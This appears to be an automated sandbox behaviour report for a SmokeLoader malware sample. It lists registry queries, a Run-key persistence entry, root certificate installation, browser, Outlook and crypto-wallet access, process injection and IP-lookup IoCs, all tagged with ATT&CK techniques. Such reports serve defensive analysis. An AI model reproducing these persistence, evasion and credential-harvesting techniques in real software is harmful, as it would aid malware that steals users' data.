smokeloader | 62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	3332764.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	3332764.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1090015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1090015.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5253619.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5253619.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038aa349e3318e.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation	Sun038db98f99bf9a.exe

Loads dropped DLL 64 IoCs

pid	Process
1172	setup_x86_x64_install.exe
576	setup_installer.exe
576	setup_installer.exe
576	setup_installer.exe
576	setup_installer.exe
576	setup_installer.exe
576	setup_installer.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1592	setup_install.exe
1688	cmd.exe
1688	cmd.exe
1268	cmd.exe
1268	cmd.exe
864	cmd.exe
864	cmd.exe
1344	cmd.exe
1972	Sun033e271e0ce96c08.exe
1972	Sun033e271e0ce96c08.exe
1956	cmd.exe
1956	cmd.exe
928	cmd.exe
1368	Sun0397381f1f458e.exe
1368	Sun0397381f1f458e.exe
1712	Sun0324aba28588c0.exe
1712	Sun0324aba28588c0.exe
560	cmd.exe
1372	Sun039750b00c.exe
1372	Sun039750b00c.exe
1744	cmd.exe
960	cmd.exe
1784	Sun038aa349e3318e.exe
1784	Sun038aa349e3318e.exe
1796	Sun038db98f99bf9a.exe
1796	Sun038db98f99bf9a.exe
1368	Sun0397381f1f458e.exe
1892	cmd.exe
584	cmd.exe
1628	Sun03f5d51697d04.exe
1628	Sun03f5d51697d04.exe
1676	Sun0397381f1f458e.exe
1676	Sun0397381f1f458e.exe
1708	Sun03d477f1a31.exe
1708	Sun03d477f1a31.exe
1628	Sun03f5d51697d04.exe
1268	Sun03f5d51697d04.tmp
1268	Sun03f5d51697d04.tmp
1268	Sun03f5d51697d04.tmp
1268	Sun03f5d51697d04.tmp
2088	Sun03f5d51697d04.exe
2088	Sun03f5d51697d04.exe
2088	Sun03f5d51697d04.exe
2204	Sun03f5d51697d04.tmp
2204	Sun03f5d51697d04.tmp
2204	Sun03f5d51697d04.tmp
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe
2560	WerFault.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe
Key opened	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	explorer.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6125322.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 3 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5253619.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	3332764.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	1090015.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 8 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
58	ipinfo.io
59	ipinfo.io
60	ipinfo.io
64	api.db-ip.com
65	api.db-ip.com
66	api.db-ip.com
18	ip-api.com
57	ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

pid	Process
2436	5253619.exe
2704	3332764.exe
2912	1090015.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2672 set thread context of 3108	2672	conhost.exe	142

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-JDN5H.tmp	Sun03f5d51697d04.tmp
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	Sun03f5d51697d04.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
2560	1708	WerFault.exe	47
3064	1784	WerFault.exe	55
2940	1796	WerFault.exe	54
852	2652	WerFault.exe	110
3796	2516	WerFault.exe	96

Checks SCSI registry key(s) 3 TTPs 9 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	492D.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	NETSTAT.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	492D.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	NETSTAT.EXE
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Sun0324aba28588c0.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	492D.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	NETSTAT.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
2024	schtasks.exe

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2360	tasklist.exe

Gathers network information 2 TTPs 3 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

Command-Line Interface

T1059

pid	Process
2536	NETSTAT.EXE
4076	NETSTAT.EXE
3872	ipconfig.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

pid	Process
3720	systeminfo.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
2256	taskkill.exe
3352	taskkill.exe
2460	taskkill.exe
2568	taskkill.exe
2468	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 35 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = b0bf59dd24ced701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\SOFTWARE\Microsoft\Internet Explorer\Main	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{C8EBA9E1-3A17-11EC-826A-5A38D35B81CE} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a6000000000200000000001066000000010000200000001947b9e9bbc6118697b0ef04b2b65cd5d2bfa82c31e1fd94b709a09afa74fe4e000000000e8000000002000020000000f658cc6c798a9fe474775a860dad39cb7b4ba348b0d98ff8bec5807a22386f712000000047d70fce46beaf06d480c2af9e87af9cb8e43f1d6ddea1c4df9bdc8d5ccd296e40000000d385913221e2d7f54e1d927a57e5a77131d8d90a542f640fac1612d2111169d39feaa7797a3e5059a21fa615ca7802cbaf3023425860cba82c6e631eae738344	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000005f45a3407a6eee4cb6062dddd85478a600000000020000000000106600000001000020000000f944906361d6cdb69346520a3e72212acbf0284d7f3b9cfddc45fd870689f2c0000000000e8000000002000020000000dd7a9820d43c7869bf64f43f9799c1ccae5070ea23c9b715ae6ace7cdde515c5900000006cf6ec8bd504eb868e906c16c90b6f5e3b2318974d823d5a3098cd5cb451a51c86655797446d0f5814dc2acdcc73907f42e964bc97172083d34de5b6bda656df5895c257c2c3a78cb072ccdece1aa51da9561a096db11f90e041fd9e050a31f3c02fc062d73b90128dbf93dcf4f95d45ea045de28f8e3192d9f8f0eca766bed475b16fa09b393bedabf01f827f0918ae400000004e268a3eebf5ab7dd58c42dec9ce71bc8990f76b174420ba7ffad010815efe94f425903b936a6a6022575f521eccb42abe01ab5ad2fa05f2d13dfa2fb90361a1	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "342428469"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe

Modifies system certificate store 2 TTPs 4 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	Sun03d477f1a31.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	Sun03d477f1a31.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	6.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	6.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1712	Sun0324aba28588c0.exe
1712	Sun0324aba28588c0.exe
1216	Process not Found
996	powershell.exe
1528	powershell.exe
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
2204	Sun03f5d51697d04.tmp
2204	Sun03f5d51697d04.tmp
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1784	Sun038aa349e3318e.exe
1796	Sun038db98f99bf9a.exe
1784	Sun038aa349e3318e.exe
1796	Sun038db98f99bf9a.exe

Suspicious behavior: GetForegroundWindowSpam 6 IoCs

pid	Process
1216	Process not Found
2560	WerFault.exe
2940	WerFault.exe
3064	WerFault.exe
852	WerFault.exe
3796	WerFault.exe

Suspicious behavior: MapViewOfSection 64 IoCs

pid	Process
1712	Sun0324aba28588c0.exe
3652	492D.exe
4076	NETSTAT.EXE
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
3252	explorer.exe
3252	explorer.exe
2820	explorer.exe
2820	explorer.exe
1216	Process not Found
1216	Process not Found
3980	explorer.exe
3980	explorer.exe
1216	Process not Found
1216	Process not Found
2284	explorer.exe
2284	explorer.exe
1216	Process not Found
1216	Process not Found
1728	explorer.exe
1728	explorer.exe
1728	explorer.exe
1728	explorer.exe
1216	Process not Found
1216	Process not Found
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
1728	explorer.exe
2168	explorer.exe
1728	explorer.exe
1728	explorer.exe
1728	explorer.exe
2168	explorer.exe
2168	explorer.exe
1728	explorer.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeCreateTokenPrivilege	1708	Sun03d477f1a31.exe
Token: SeAssignPrimaryTokenPrivilege	1708	Sun03d477f1a31.exe
Token: SeLockMemoryPrivilege	1708	Sun03d477f1a31.exe
Token: SeIncreaseQuotaPrivilege	1708	Sun03d477f1a31.exe
Token: SeMachineAccountPrivilege	1708	Sun03d477f1a31.exe
Token: SeTcbPrivilege	1708	Sun03d477f1a31.exe
Token: SeSecurityPrivilege	1708	Sun03d477f1a31.exe
Token: SeTakeOwnershipPrivilege	1708	Sun03d477f1a31.exe
Token: SeLoadDriverPrivilege	1708	Sun03d477f1a31.exe
Token: SeSystemProfilePrivilege	1708	Sun03d477f1a31.exe
Token: SeSystemtimePrivilege	1708	Sun03d477f1a31.exe
Token: SeProfSingleProcessPrivilege	1708	Sun03d477f1a31.exe
Token: SeIncBasePriorityPrivilege	1708	Sun03d477f1a31.exe
Token: SeCreatePagefilePrivilege	1708	Sun03d477f1a31.exe
Token: SeCreatePermanentPrivilege	1708	Sun03d477f1a31.exe
Token: SeBackupPrivilege	1708	Sun03d477f1a31.exe
Token: SeRestorePrivilege	1708	Sun03d477f1a31.exe
Token: SeShutdownPrivilege	1708	Sun03d477f1a31.exe
Token: SeDebugPrivilege	1708	Sun03d477f1a31.exe
Token: SeAuditPrivilege	1708	Sun03d477f1a31.exe
Token: SeSystemEnvironmentPrivilege	1708	Sun03d477f1a31.exe
Token: SeChangeNotifyPrivilege	1708	Sun03d477f1a31.exe
Token: SeRemoteShutdownPrivilege	1708	Sun03d477f1a31.exe
Token: SeUndockPrivilege	1708	Sun03d477f1a31.exe
Token: SeSyncAgentPrivilege	1708	Sun03d477f1a31.exe
Token: SeEnableDelegationPrivilege	1708	Sun03d477f1a31.exe
Token: SeManageVolumePrivilege	1708	Sun03d477f1a31.exe
Token: SeImpersonatePrivilege	1708	Sun03d477f1a31.exe
Token: SeCreateGlobalPrivilege	1708	Sun03d477f1a31.exe
Token: 31	1708	Sun03d477f1a31.exe
Token: 32	1708	Sun03d477f1a31.exe
Token: 33	1708	Sun03d477f1a31.exe
Token: 34	1708	Sun03d477f1a31.exe
Token: 35	1708	Sun03d477f1a31.exe
Token: SeDebugPrivilege	1976	Sun03ea09aa5c9686e5.exe
Token: SeDebugPrivilege	996	powershell.exe
Token: SeDebugPrivilege	1528	powershell.exe
Token: SeDebugPrivilege	2460	taskkill.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeDebugPrivilege	2560	WerFault.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeDebugPrivilege	2940	WerFault.exe
Token: SeDebugPrivilege	3064	WerFault.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeDebugPrivilege	2744	Sun0328255c4bce6fb.exe
Token: SeDebugPrivilege	2568	taskkill.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeDebugPrivilege	2404	4.exe
Token: SeDebugPrivilege	2072	5.exe
Token: SeDebugPrivilege	2468	taskkill.exe
Token: SeDebugPrivilege	2652	6.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeDebugPrivilege	2500	DownFlSetup110.exe
Token: SeShutdownPrivilege	1216	Process not Found
Token: SeShutdownPrivilege	1216	Process not Found

Suspicious use of FindShellTrayWindow 16 IoCs

pid	Process
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
2204	Sun03f5d51697d04.tmp
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
660	iexplore.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found
1216	Process not Found

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
660	iexplore.exe
660	iexplore.exe
3756	IEXPLORE.EXE
3756	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
PID 1172 wrote to memory of 576	1172	setup_x86_x64_install.exe	28
